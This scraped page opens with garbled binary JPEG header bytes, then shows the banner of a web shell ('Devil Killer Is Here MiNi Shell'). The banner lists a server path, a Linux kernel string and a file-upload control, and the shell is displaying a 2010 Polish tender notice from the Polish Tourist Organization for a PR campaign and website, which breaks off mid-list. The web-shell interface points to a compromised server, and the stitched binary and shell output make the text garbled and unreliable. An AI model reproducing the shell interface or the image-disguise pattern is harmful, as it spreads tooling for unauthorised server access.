JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100423/95839-N-2010.html

<p class="kh_header"><b>Warszawa: Zaprojektowanie, realizację i koordynację działań public relations na rynku krajowym, kampanii promocyjnej /Promujmy Polskę Razem/ organizowanej przez Polską Organizację Turystyczną wraz z przygotowaniem i prowadzeniem dedykowanej projektowi witryny internetowej</b><br>
<b>Numer ogłoszenia: 95839 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Organizacja Turystyczna , ul. Tytusa Chałubińskiego 8, 00-613 Warszawa, woj. mazowieckie, tel. 0-22 5367070, 5367011, faks 022 5367004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pot.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, realizację i koordynację działań public relations na rynku krajowym, kampanii promocyjnej /Promujmy Polskę Razem/ organizowanej przez Polską Organizację Turystyczną wraz z przygotowaniem i prowadzeniem dedykowanej projektowi witryny internetowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia w prowadzonym postępowaniu o udzielenie zamówienia publicznego jest zaprojektowanie, realizacja i koordynacja działań public relations na rynku krajowym, kampanii promocyjnej Projektu Promujmy Polskę Razem organizowanego przez Polską Organizację Turystyczną wraz z przygotowaniem i prowadzeniem dedykowanej projektowi witryny internetowej.
Szczegółowy opis przedmiotu zamówienia znajduje się w punkcie 2 oraz jest spójny ze szczegółowym opisem Projektu stanowiącym załącznik nr 2 do niniejszej SIWZ. 
W ramach działań mających na celu promocję polskiej turystyki oraz wzmocnienie wizerunku Polski jako kraju atrakcyjnego turystycznie, Polska Organizacja Turystyczna będąc beneficjentem Działania 6.3 Promocja turystycznych walorów Polski osi priorytetowej 6 Programu Operacyjnego Innowacyjna Gospodarka, 2007 - 2013 przygotowała projekt Promujmy Polskę Razem. Oczekiwanym efektem działań agencji public relations jest upowszechnienie wiedzy na temat Projektu i jego kluczowych przesłań na rynku polskim wśród grup docelowych, zgodnych z założeniami Projektu, a w efekcie końcowym zwiększenie postrzegania Polski jako atrakcyjnej destynacji turystycznej wśród mieszkańców Polski.
Szczegółowy opis Projektu Promujmy Polskę Razem stanowi załącznik nr 2 do SIWZ.
2. Przedmiotem zamówienia jest:
a) Opracowanie, realizacja i kontrola działań public relations, ze szczególnym uwzględnieniem relacji z mediami na rynku krajowym, kampanii promocyjnej  Projektu Promujmy Polskę Razem
b) Przygotowanie, wdrożenie oraz prowadzenie redakcyjne i techniczne przez czas trwania umowy, portalu internetowego o adresie www.promujmypolskerazem.pl dla potrzeb Projektu Promujmy Polskę Razem, zgodnie z zapisami w Szczegółowym opisie portalu, który stanowi załącznik nr 2 do SIWZ.
Zakres przedmiotu zamówienia:
Zamawiający, czyli Polska Organizacja Turystyczna oczekuje od wyłonionego Wykonawcy w okresie od dnia podpisania umowy do 30 listopada 2012 roku realizacji działań public relations w ramach planowanej kwoty 585 000 zł brutto, w tym:
- przygotowanie i wdrożenie koncepcji działań z zakresu relacji z mediami, 
- określenie grup docelowych, do których będzie skierowany komunikat o Projekcie Promujmy Polskę Razem i prowadzonych przez Polską Organizację Turystyczną działań w ramach Projektu w kraju i za granicą, opracowanie planu działań i dobór narzędzi komunikacji dla poszczególnych grup docelowych,
- przygotowanie i przeprowadzenie kampanii promocyjnej w Polsce skierowanej do polskich mediów, która będzie miała na celu dotarcie do jak największej liczby Polaków z informacją o Projekcie Promujmy Polskę Razem i prowadzonych przez Polską Organizację Turystyczną działań w ramach Projektu w kraju i za granicą, 
- przygotowanie i przekazanie Zamawiającemu przygotowanych na potrzeby Projektu Promujmy Polskę Razem bazy mediów i dziennikarzy krajowych,
- systematyczne organizowanie konferencji prasowych i briefingów, realizowane w ramach niniejszego zamówienia, co najmniej jeden briefing w miesiącu i co najmniej 
6 konferencji prasowych w roku w terminach uzgodnionych z Zamawiającym, związanych z wydarzeniami realizowanymi w ramach Projektu i według scenariusza uzgodnionego z Zamawiającym,
- systematyczne organizowanie innych niż konferencja prasowa i briefing, form komunikacji z mediami, realizowane w ramach niniejszego zamówienia, nie mniej niż 20 takich zdarzeń przez czas trwania obowiązującej umowy, w terminach uzgodnionych z Zamawiającym i według scenariusza uzgodnionego z Zamawiającym, z założeniem, że Wykonawca powinien zorganizować 2 takie zdarzenia na kwartał,
- zorganizowanie w ramach niniejszego zamówienia imprez promocyjnych z udziałem tzw. osób medialnych, uprzednio uzgodnionych z Zamawiającym i w terminach uzgodnionych z Zamawiającym, związanych z wydarzeniami realizowanymi w ramach Projektu i według scenariusza uzgodnionego z Zamawiającym, co najmniej 3 przez czas trwania obowiązującej umowy, z założeniem, że Wykonawca powinien zorganizować 1 takie wydarzenie w roku,
- systematycznego przygotowywania i dystrybucji materiałów prasowych związanych z każdym realizowanym przez POT działaniem w ramach Projektu Promujmy Polskę Razem, co najmniej sześć razy w miesiącu,
- organizowanie konferencji prasowych przy wskazanych przez Zamawiającego ważnych wydarzeniach związanych z realizacją Projektu, w tym między innymi 12 czerwca 2010 r. wypłynięcie żaglowca ze Szczecina i jego powrót do Gdyni 18 września 2010 r. 
- reagowanie w przemyślany, zgodnie z zaakceptowaną przez Zamawiającego przygotowaną przez Wykonawcę strategię działań w sytuacji kryzysowej,
- nawiązywanie kontaktów z mediami i organizacja briefingów celem prezentacji poszczególnych działań Projektu Promujmy Polskę Razem wynikających z bieżących potrzeb informacyjnych,
- przygotowywanie na bazie informacji prasowych krótkich materiałów informacyjnych i dystrybuowania ich do subskrybentów newsletterów Polskiej Organizacji Turystycznej,
- monitoring mediów i przygotowanie, co miesiąc kompleksowej analizy jakościowej 
i ilościowej ukazujących się w mediach materiałów,
- analizę czynników, wynikających z przekazów medialnych, które mogą negatywnie wpłynąć na postrzeganie Projektu Promujmy Polskę Razem i prezentacja ich Zamawiającemu wraz z propozycją adekwatnych do sytuacji działań,
- współpraca z innymi wyłonionymi w wyniku przetargów przeprowadzonych przez Polską Organizację Turystyczną, podmiotów działających na rzecz Projektu Promujmy Polskę Razem w kraju i za granicą i realizujących zadania w ramach Projektu.
- współpraca informacyjna z 14 Polskimi Ośrodkami Informacji Turystycznej za granicą (jednostkami Polskiej Organizacji Turystycznej),
- ścisła współpraca informacyjna ze wszystkimi podmiotami w kraju i za granicą zaangażowanymi w proces komunikacji w ramach Projektu, 
- przygotowanie, wdrożenie i prowadzenie samodzielne lub w kooperacji z agencją interaktywną portalu internetowego o adresie www.promujmypolskerazem.pl na potrzeby promocji Projektu Promujmy Polskę Razem wraz z jego pozycjonowaniem 
z uwzględnieniem grup docelowych Projektu (Szczegółowy opis Projektu Promujmy Polskę Razem stanowi załącznik nr 2 do SIWZ, Opis wykonania serwisu oraz technicznych warunków znajduje się w załączniku nr 8 Istotne postanowienia umowy §4 i §9)
- wykorzystanie w działaniach promocyjnych Projektu istniejącej strony www.zarabiajnaturystyce.pl z propozycją modyfikacji strony i jej pozycjonowania dla uzyskania celów określonych dla Projektu Promujmy Polskę Razem,
- prowadzenie internetowego biura prasowego na potrzeby Projektu Promujmy Polskę Razem na dedykowanej stronie www Projektu,
- wszystkie materiały przygotowane w ramach Projektu Promujmy Polskę Razem muszą być przygotowywane w języku polskim i co najmniej w języku angielskim,
- cykliczne sprawozdania z wykonania usługi.
Zamawiający zastrzega sobie możliwość wprowadzenia zmian w przedstawionych przez Wykonawcę w złożonej ofercie propozycji realizacji niniejszego zamówienia w ramach:
a) koncepcji kampanii promocyjnej w Polsce skierowanej do polskich mediów, która będzie miała na celu dotarcie do jak największej liczby Polaków z informacją o Projekcie Promujmy Polskę Razem i prowadzonych przez Polską Organizację Turystyczną działań w ramach Projektu w kraju i za granicą, 
b) koncepcji działań z zakresu relacji z mediami wszystkich (20 wymaganych w SIWZ oraz dodatkowych zaproponowanych przez Wykonawcę) działań innych niż konferencje prasowe i briefingi,
c) planu działań public relations w Polsce na rzecz Projektu Promujmy Polskę Razem wszystkich (wymaganych w SIWZ oraz dodatkowych zaproponowanych przez Wykonawcę) konferencji, briefingów i imprez promocyjnych z udziałem osób medialnych (przyciągających uwagę mediów)
d) zaproponowanych przez Wykonawcę projektów graficznych strony www.promujmypolskerazem.pl 
Wyżej wskazane ewentualne zmiany będą każdorazowo uzgadniane z Wykonawcą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.41.60.00-3, 79.41.61.00-4, 79.41.62.00-5, 79.95.20.00-2, 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości 10 000 PLN (słownie: dziesięć tysięcy złotych), ważnym w okresie terminu związania ofertą.
2. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania oferty.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
65 1030 1508 0000 0008 0291 9115 z adnotacją Wadium - na Zaprojektowanie, realizację i koordynację działań public relations na rynku krajowym, kampanii promocyjnej Promujmy Polskę Razem organizowanej przez Polską Organizację Turystyczną wraz z przygotowaniem i prowadzeniem dedykowanej projektowi witrynie internetowej. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
5. Wadium w formie innej niż pieniężna należy składać w siedzibie Zamawiającego (Warszawa, ul. Chałubińskiego 8, XIX piętro (sekretariat POT), od poniedziałku do piątku w godz. 8.00 - 16.00.
6. Zamawiający zwraca wadium zgodnie z zasadami określonymi w ustawie Prawo zamówień publicznych.
7. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
8. Jeżeli wadium wniesione zostanie w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku zaistnienia okoliczności określonych w art. 46 ustawy Prawo zamówień publicznych.
10. Jeżeli Wykonawca nie wniesie wadium, zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.
11. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy o którym mowa w SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że wykonawca spełnienia warunek udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, że Wykonawca spełnił warunki, jeśli wykaże, że należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 5 zamówień (od fazy projektowania do zakończenia - potwierdzonych  rekomendacją od zleceniodawcy), polegających na zaprojektowaniu i przeprowadzeniu kampanii 
z zakresu public relations, a w tym:
a) co najmniej jedna kampania miała wartość minimum 100 000,00 zł brutto, 
(a w przypadku, jeżeli wartość usługi została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 100 000,00 zł. brutto wg średniego kursu NBP z dnia zawarcia umowy o wykonanie kampanii),
b) co najmniej jedna przeprowadzona kampania public relations miała zasięg ogólnopolski i w jej ramach realizowane były relacje z mediami,
c) co najmniej jedna kampania trwała dłużej niż 12 tygodni, przy czym jako czas trwania kampanii należy rozumieć faktyczny okres realizacji działań komunikacyjnych (bez fazy przygotowawczej i sprawozdawczej),
d) co najmniej jedna kampania obejmowała swym zakresem przygotowanie materiałów prasowych oraz ich dystrybucję,
e) co najmniej jedna kampania polegała na współtworzeniu i prowadzeniu redakcyjnym portalu internetowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że wykonawca spełnienia warunek udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, że Wykonawca spełnił warunki, jeśli wykaże, że dysponuje lub będzie dysponował:
1) co najmniej dwoma osobami posiadającymi doświadczenie i wiedzę umożliwiającą przygotowanie, zarządzanie i administrowanie redakcyjne portalem internetowym, tj. osoby mające doświadczenie w pracy z systemami CMS i dobrą znajomość języka angielskiego w mowie i piśmie na poziomie ADVANCED (popartą stosownym certyfikatem), a także doświadczenie na stanowisku redaktora portalu internetowego,
2) co najmniej 4 osobami niezbędnymi do wykonania zamówienia, z zakresu prowadzenia relacji z mediami, tj. 
a) liderem zespołu mającym:
­- min. 3 lata doświadczenia w zakresie public relations w tym szczególnie 
w zarządzaniu zespołem, a także projektowaniu, realizacji i monitoringu działań w zakresie relacji z mediami,
­- min. 3 lata doświadczenia w przygotowaniu i prowadzeniu kampanii informacyjnych, edukacyjnych lub społecznych, oraz planowania mediów.
b) trzema członkami zespołu, którzy mają:
­- min. 3 lata doświadczenia w zakresie public relations w tym szczególnie 
w projektowaniu, realizacji i monitoringu działań z zakresu relacji z mediami,
­- min. 3 lata doświadczenia w przeprowadzaniu i redagowaniu wywiadów, przygotowaniu tekstów o charakterze informacyjnym,
­- brali udział w realizacji co najmniej dwóch kampanii informacyjnych, obejmującej jednocześnie następujące nośniki przekazu: prasa, radio, telewizja, portale internetowe,

wszystkie ww. dedykowane do projektu osoby (z podpunktu b) muszą mieć wykształcenie wyższe magisterski.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, że Wykonawca spełnił warunki, jeśli wykaże, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, co oznacza, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę minimum 200 000 zł (słownie: dwieście tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy/ów formularz Oferta, według wzoru stanowiącego załącznik nr 1 do SIWZ,
2) pisemne zobowiązanie innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, do oddania Wykonawcy, do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli dotyczy,
3) pełnomocnictwo - do reprezentowania wszystkich Wykonawców biorących udział 
w niniejszym postępowaniu (w przypadku wykonawców wspólnie ubiegających się 
